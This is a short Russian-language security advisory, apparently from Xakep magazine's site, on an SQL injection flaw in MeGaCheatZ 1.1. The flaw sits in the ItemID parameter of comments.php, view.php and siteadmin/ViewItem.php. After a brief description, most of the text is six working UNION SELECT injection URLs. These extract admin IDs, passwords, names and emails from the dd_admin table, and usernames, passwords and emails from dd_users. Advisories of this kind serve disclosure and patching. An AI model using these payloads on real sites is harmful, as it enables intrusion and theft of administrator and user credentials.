Хакер #305. Многошаговые SQL-инъекции
Программа: MeGaCheatZ 1.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре множественными сценариями, например, comments.php, view.php и ViewItem.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[site]/comments.php?ItemID=-1+union+select+concat(AdminID, char(58),AdminPass,char(58),AdminName,char(58),AdminEmail) +from+dd_admin/*
http://[site]/view.php?ItemID='+union+select+1,2,3,4,concat(AdminID, char(58),AdminPass,char(58),AdminName,char(58),AdminEmail), 6,7,8,9,10+from+dd_admin/*
http://[site]/siteadmin/ViewItem.php?ItemID='+union+select+ 1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName, char(58),AdminEmail),6,7,8,9,10,11,12,13,14,15, 16,17,18+from+dd_admin/*
http://[site]/comments.php?ItemID=-1+union+select+ concat(username,char(58),password,char(58), email)+from+dd_users+where+ UserID=[UserID]/*
http://[site]/view.php?ItemID='+union+select+1,2,3,4, concat(username,char(58),password,char(58),email),6,7,8,9,10+from+ dd_users+where+UserID=[UserID]/*
http://[site]/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(username,char(58),password,char(58),email),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_users+where+UserID=[UserID]/*